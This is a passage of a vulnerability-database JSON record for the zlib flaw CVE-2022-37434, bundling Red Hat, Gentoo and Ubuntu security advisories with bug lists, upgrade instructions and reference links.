JIRA issues fixed (https://issues.jboss.org/):\n\nOCPBUGS-1099 - Missing $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster\nOCPBUGS-1346 - OpenStack UPI scripts do not create server group for Computes\nOCPBUGS-1658 - Whereabouts should allow non default interfaces to Pod IP list [backport 4.11]\nOCPBUGS-1713 - Kuryr-Controller Restarting on KuryrPort with missing pod\nOCPBUGS-1955 - [4.11] Dual stack cluster fails on installation when multi-path routing entries exist\nOCPBUGS-1972 - [IPI on Baremetal] ipv6 support issue in metal3-httpd\nOCPBUGS-1984 - Install Helm chart form doesn\u0027t allow the user select a specific version\nOCPBUGS-2011 - [4.11] ironic clear_job_queue and reset_idrac pending issues\nOCPBUGS-2014 - CI: Backend unit tests fails because devfile registry was updated (mock response)\nOCPBUGS-2042 - [2102088] 4.11 CatalogSourcesUnhealthy error in subscription When upgrading ptp-operator\nOCPBUGS-2046 - Remove policy/v1beta1 in 4.11 and later\nOCPBUGS-2050 - [release-4.11] DNS operator does not reconcile the openshift-dns namespace\nOCPBUGS-2092 - Use floating tags in golang imagestream\nOCPBUGS-2112 - [release-4.11] Address e2e failures due to pod security\nOCPBUGS-2113 - [4.11] etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNO\nOCPBUGS-2140 - member loses rights after some other user login in openid / group sync\nOCPBUGS-2293 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgrade\nOCPBUGS-2320 - [release-4.11] Remove namespace and name from gathered DVO metrics\nOCPBUGS-2451 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name\nOCPBUGS-2528 - dns-default pod missing \"target.workload.openshift.io/management:\" annotation\nOCPBUGS-2606 - [release-4.11] go.mod should beworking with golang-1.17 and golang-1.18\nOCPBUGS-2616 - e2e-gcp-builds is permafailing\nOCPBUGS-2626 - Worker creation fails 
within provider networks (as primary and secondary)\nOCPBUGS-2640 - prometheus-k8s-0 ends in CrashLoopBackOff with evel=error err=\"opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0\" on SNO after hard reboot tests\nOCPBUGS-2658 - [4.11] VPA E2Es fail due to CSV name mismatch\nOCPBUGS-2766 - \u0027oc login\u0027 should be robust in the face of gather failures\nOCPBUGS-2780 - Import: Advanced option sentence is splited into two parts and headlines has no padding\nOCPBUGS-449 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10\nOCPBUGS-526 - Prerelease report bug link should be updated to JIRA instead of Bugzilla\nOCPBUGS-668 - Prefer local dns does not work expectedly on OCPv4.11\nOCPBUGS-673 - crio occasionally fails to start during deployment\nOCPBUGS-689 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message \"No default StorageClass for this platform\" on Alicloud, IBM\nOCPBUGS-744 - [4.11] Spoke BMH stuck ?provisioning? after changing a BIOS attribute via the converged workflow\nOCPBUGS-947 - [4.11] Rebase openshift/etcd 4.11 onto 3.5.5\nOCPBUGS-955 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation\n\n6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-42\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: zlib: Multiple vulnerabilities\n Date: October 31, 2022\n Bugs: #863851, #835958\n ID: 202210-42\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA buffer overflow in zlib might allow an attacker to cause remote code\nexecution. \n\nBackground\n==========\n\nzlib is a widely used free and patent unencumbered data compression\nlibrary. 
\n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 sys-libs/zlib \u003c 1.2.12-r3 \u003e= 1.2.12-r3\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in zlib. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n======\n\nMaliciously crafted input handled by zlib may result in remote code\nexecution. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll zlib users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-libs/zlib-1.2.12-r3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-25032\n https://nvd.nist.gov/vuln/detail/CVE-2018-25032\n[ 2 ] CVE-2022-37434\n https://nvd.nist.gov/vuln/detail/CVE-2022-37434\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-42\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. 
Description:\n\nLogging Subsystem 5.5.5 - Red Hat OpenShift\n\nSecurity Fixe(s):\n\n* jackson-databind: denial of service via a large depth of nested\nobjects (CVE-2020-36518)\n\n* golang: net/http: handle server errors after sending GOAWAY\n(CVE-2022-27664)\n\n* golang: archive/tar: unbounded memory consumption when reading headers\n(CVE-2022-2879, CVE-2022-2880, CVE-2022-41715)\n\n* jackson-databind: deep wrapper array nesting wrt\nUNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\n* loader-utils: Regular expression denial of service (CVE-2022-37603)\n\n* golang: math/big: decoding big.Float and big.Rat types can panic if the\nencoded message is too short, potentially allowing a denial of service\n(CVE-2022-32189)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service\n2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service\n\n5. 
JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster\nLOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch\nLOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn\u0027t support multiple CAs\nLOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. \nLOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value\nLOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed\nLOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue\nLOG-3310 - [release-5.5] Can\u0027t choose correct CA ConfigMap Key when creating lokistack in Console\nLOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config\n\n6. ==========================================================================\nUbuntu Security Notice USN-6736-1\nApril 16, 2024\n\nklibc vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 23.10\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS (Available with Ubuntu Pro)\n- Ubuntu 16.04 LTS (Available with Ubuntu Pro)\n- Ubuntu 14.04 LTS (Available with Ubuntu Pro)\n\nSummary:\n\nSeveral security issues were fixed in klibc. \n\nSoftware Description:\n- klibc: small utilities built with klibc for early boot\n\nDetails:\n\nIt was discovered that zlib, vendored in klibc, incorrectly handled pointer\narithmetic. An attacker could use this issue to cause klibc to crash or to\npossibly execute arbitrary code. 
(CVE-2016-9840, CVE-2016-9841)\n\nDanilo Ramos discovered that zlib, vendored in klibc, incorrectly handled\nmemory when performing certain deflating operations. An attacker could use\nthis issue to cause klibc to crash or to possibly execute arbitrary code. \n(CVE-2018-25032)\n\nEvgeny Legerov discovered that zlib, vendored in klibc, incorrectly handled\nmemory when performing certain inflate operations. An attacker could use\nthis issue to cause klibc to crash or to possibly execute arbitrary code. \n(CVE-2022-37434)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 23.10:\n klibc-utils 2.0.13-1ubuntu0.1\n libklibc 2.0.13-1ubuntu0.1\n\nUbuntu 22.04 LTS:\n klibc-utils 2.0.10-4ubuntu0.1\n libklibc 2.0.10-4ubuntu0.1\n\nUbuntu 20.04 LTS:\n klibc-utils 2.0.7-1ubuntu5.2\n libklibc 2.0.7-1ubuntu5.2\n\nUbuntu 18.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.4-9ubuntu2.2+esm1\n libklibc 2.0.4-9ubuntu2.2+esm1\n\nUbuntu 16.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.4-8ubuntu1.16.04.4+esm2\n libklibc 2.0.4-8ubuntu1.16.04.4+esm2\n\nUbuntu 14.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.3-0ubuntu1.14.04.3+esm3\n libklibc 2.0.3-0ubuntu1.14.04.3+esm3\n\nIn general, a standard system update will make all the necessary changes. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: OpenShift Container Platform 4.11.45 bug fix and security update\nAdvisory ID: RHSA-2023:4053-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:4053\nIssue date: 2023-07-19\nCVE Names: CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 \n CVE-2019-20838 CVE-2020-14155 CVE-2020-24370 \n CVE-2020-35525 CVE-2020-35527 CVE-2021-3580 \n CVE-2021-3634 CVE-2021-20231 CVE-2021-20232 \n CVE-2021-23177 CVE-2021-31566 CVE-2021-36084 \n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 \n CVE-2021-40528 CVE-2022-1271 CVE-2022-1586 \n CVE-2022-1785 CVE-2022-1897 CVE-2022-1927 \n CVE-2022-4304 CVE-2022-4450 CVE-2022-21235 \n CVE-2022-24407 CVE-2022-29824 CVE-2022-34903 \n CVE-2022-37434 CVE-2022-38177 CVE-2022-38178 \n CVE-2022-40674 CVE-2022-42010 CVE-2022-42011 \n CVE-2022-42012 CVE-2022-42898 CVE-2022-47629 \n CVE-2023-0215 CVE-2023-0361 CVE-2023-1281 \n CVE-2023-24329 CVE-2023-32233 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.11.45 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.11. \n\nRed Hat Product Security has rated this update as having a security impact\nof [impact]. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.11.45. 
See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2023:4052\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nSecurity Fix(es):\n\n* github.com/Masterminds/vcs: Command Injection via argument injection\n(CVE-2022-21235)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift CLI (oc)\nor web console. Instructions for upgrading a cluster are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nfor x86_64, s390x, ppc64le, and aarch64 architectures. The image digests\nmay be found at\nhttps://quay.io/repository/openshift-release-dev/ocp-release?tab=tags. 
\n\nThe sha values for the release are\n\n(For x86_64 architecture)\nThe image digest is\nsha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9\n\n(For s390x architecture)\nThe image digest is\nsha256:622b5361f95d1d512ea84f363ac06155cbb9ee28e85ccaae1acd80b98b660fa8\n\n(For ppc64le architecture)\nThe image digest is\nsha256:50c131cf85dfb00f258af350a46b85eff8fb8084d3e1617520cd69b59caeaff7\n\n(For aarch64 architecture)\nThe image digest is\nsha256:9e575c4ece9caaf31acbef246ccad71959cd5bf634e7cb284b0849ddfa205ad7\n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift CLI (oc)\nor web console. Instructions for upgrading a cluster are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2215317 - CVE-2022-21235 github.com/Masterminds/vcs: Command Injection via argument injection\n\n5. JIRA issues fixed (https://issues.redhat.com/):\n\nOCPBUGS-15446 - (release-4.11) gather \"gateway-mode-config\" config map from \"openshift-network-operator\" namespace\nOCPBUGS-15532 - visiting Configurations page returns error Cannot read properties of undefined (reading \u0027apiGroup\u0027)\nOCPBUGS-15645 - Can\u0027t use git lfs in BuildConfig git source with strategy Docker\nOCPBUGS-15739 - Environment cannot find Python\nOCPBUGS-15758 - [release-4.11] Bump Jenkins and Jenkins Agent Base image versions\nOCPBUGS-15942 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get \"https://registry.centos.org/v2/\": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host\nOCPBUGS-15966 - [4.12] MetalLB contains incorrect data Correct and incorrect MetalLB resources coexist should have correct statuses\n\n6. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-35525\nhttps://access.redhat.com/security/cve/CVE-2020-35527\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3634\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-40528\nhttps://access.redhat.com/security/cve/CVE-2022-1271\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-4304\nhttps://access.redhat.com/security/cve/CVE-2022-4450\nhttps://access.redhat.com/security/cve/CVE-2022-21235\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/cve/CVE-2022-29824\nhttps://access.redhat.com/security/cve/CVE-2022-34903\nhttps://access.redhat.com/security/cve/CVE-2022-37434\nhttps://access.redhat.com/security/cve/CVE-2022-38177\nhttps://access.redhat.com/security/cve/CVE-2022-38178\nhttps://access.redhat.com/security/cve/CVE-2022-40674\nhttps://access.redhat.com/security/cve/CVE-2022-42010\nhttps://access.redhat.com/security/cve/CVE-2022-42011\nhttps://access.redhat.com/security/cve/CVE-2022-42012\nhttps://access.redhat.com/security/cve/CVE-2022-42898\nhttps://access.redhat.com/security/cve/CVE-2022-47629\nhttps://access.redhat.com/security/cve/CVE-2023-0215\nhttps://access.redhat.com/security/cve/CVE-2023-0361\nhttps://access.redhat.com/security/cve/CVE-2023-1281\nhttps://access.redhat.com/security/cve/CVE-2023-24329\nhttps://access.redhat.com/security/cve/CVE-2023-32233\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
},
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 2.07
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-428208",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-37434",
"trust": 2.3
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/08/05/2",
"trust": 1.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/08/09/1",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "169624",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169595",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "169707",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170027",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169503",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171271",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169726",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168107",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169566",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169906",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169783",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169557",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168113",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169577",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168765",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-428208",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-37434",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169335",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170210",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169810",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170242",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169692",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169696",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170162",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "178074",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "173605",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"id": "VAR-202208-0404",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:18:09.441000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: zlib: CVE-2022-37434",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f5712d783fb1fc3f3fa283bb16da0e35"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/ivd38/zlib_overflow"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-37434"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-120",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "https://github.com/ivd38/zlib_overflow"
},
{
"trust": 1.2,
"url": "http://www.openwall.com/lists/oss-security/2022/08/05/2"
},
{
"trust": 1.2,
"url": "https://github.com/curl/curl/issues/9271"
},
{
"trust": 1.2,
"url": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#l1062-l1063"
},
{
"trust": 1.2,
"url": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1"
},
{
"trust": 1.2,
"url": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#l762-l764"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/37"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/38"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/42"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5218"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/pavpqncg3xrlclnsqrm3kan5zfmvxvty/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nmboj77a7t7pqcarmduk75te6llesz3o/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yrqai7h4m4rqz2iwzueexecbe5d56bh2/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/x5u7otkzshy2i3zfjsr2shfhw72rkgdk/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jwn4ve3jqr4o2sous5txnlanrpmhwv4i/"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2022/08/09/1"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220901-0005/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213489"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213490"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213491"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213493"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213494"
},
{
"trust": 1.0,
"url": "https://security.netapp.com/advisory/ntap-20230427-0007/"
},
{
"trust": 1.0,
"url": "https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-37434"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.4,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-29900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1353"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1353"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0494"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23816"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23816"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2509"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2588"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0494"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-2588"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-29901"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23825"
